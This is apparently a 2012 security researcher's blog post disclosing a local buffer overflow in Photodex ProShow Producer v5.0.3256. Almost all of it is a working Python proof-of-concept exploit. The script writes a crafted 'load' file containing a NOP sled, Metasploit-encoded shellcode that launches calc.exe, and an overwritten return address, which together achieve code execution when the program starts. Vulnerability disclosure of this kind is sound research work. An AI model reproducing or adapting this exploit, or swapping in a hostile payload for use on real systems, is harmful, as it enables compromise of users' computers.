Julien Ahrens

Vulnerability Intel | ROP Gadget Hunter | Privacy Enthusiast | Full-time BugBounty hunter | @Hacker0x01 MVH | @SynackRedTeam member | on a world-trip

Exploit for Photodex ProShow Producer v5.0.3256 vulnerability

02 Jul 2012 » Advisory, Exploit

My latest finding: Photodex ProShow Producer v5.0.3256 Local Buffer Overflow Vulnerability

And…just a very, very, very quick and not reliable way of exploiting the vulnerability to execute some code. I’m working on a nicer(better) solution :-)

#!/usr/bin/python

# Exploit Title: Photodex ProShow Producer v5.0.3256 Local Buffer Overflow Vulnerability PoC
# Version:       v5.0.3256
# Date:          2012-07-02
# Author:        Julien Ahrens
# Homepage:      https://www.rcesecurity.com
# Software Link: http://www.photodex.com
# Tested on:     Windows XP SP3 Professional German
# Notes:         -
# Howto:         Place file into appdir -> Launch

from struct import pack

file="load"

# windows/exec CMD=calc.exe
# Encoder: x86/shikata_ga_nai
# powered by Metasploit
# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d'
shellcode = ("\xdd\xc1\xbb\x45\x1d\x9a\xae\xd9\x74\x24\xf4\x5d\x2b\xc9" +
"\xb1\x33\x31\x5d\x17\x83\xed\xfc\x03\x18\x0e\x78\x5b\x5e" +
"\xd8\xf5\xa4\x9e\x19\x66\x2c\x7b\x28\xb4\x4a\x08\x19\x08" +
"\x18\x5c\x92\xe3\x4c\x74\x21\x81\x58\x7b\x82\x2c\xbf\xb2" +
"\x13\x81\x7f\x18\xd7\x83\x03\x62\x04\x64\x3d\xad\x59\x65" +
"\x7a\xd3\x92\x37\xd3\x98\x01\xa8\x50\xdc\x99\xc9\xb6\x6b" +
"\xa1\xb1\xb3\xab\x56\x08\xbd\xfb\xc7\x07\xf5\xe3\x6c\x4f" +
"\x26\x12\xa0\x93\x1a\x5d\xcd\x60\xe8\x5c\x07\xb9\x11\x6f" +
"\x67\x16\x2c\x40\x6a\x66\x68\x66\x95\x1d\x82\x95\x28\x26" +
"\x51\xe4\xf6\xa3\x44\x4e\x7c\x13\xad\x6f\x51\xc2\x26\x63" +
"\x1e\x80\x61\x67\xa1\x45\x1a\x93\x2a\x68\xcd\x12\x68\x4f" +
"\xc9\x7f\x2a\xee\x48\x25\x9d\x0f\x8a\x81\x42\xaa\xc0\x23" +
"\x96\xcc\x8a\x29\x69\x5c\xb1\x14\x69\x5e\xba\x36\x02\x6f" +
"\x31\xd9\x55\x70\x90\x9e\xaa\x3a\xb9\xb6\x22\xe3\x2b\x8b" +
"\x2e\x14\x86\xcf\x56\x97\x23\xaf\xac\x87\x41\xaa\xe9\x0f" +
"\xb9\xc6\x62\xfa\xbd\x75\x82\x2f\xde\x18\x10\xb3\x0f\xbf" +
"\x90\x56\x50")

junk1="\x90" * (9848 - (len(shellcode)))
boom=pack('<L',0x01618F29)
junk2="\x43" * 100

poc=junk1 + shellcode + boom + junk2

try:
    print "[*] Creating exploit file...\n";
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] File successfully created!";
except:
    print "[!] Error while creating file!";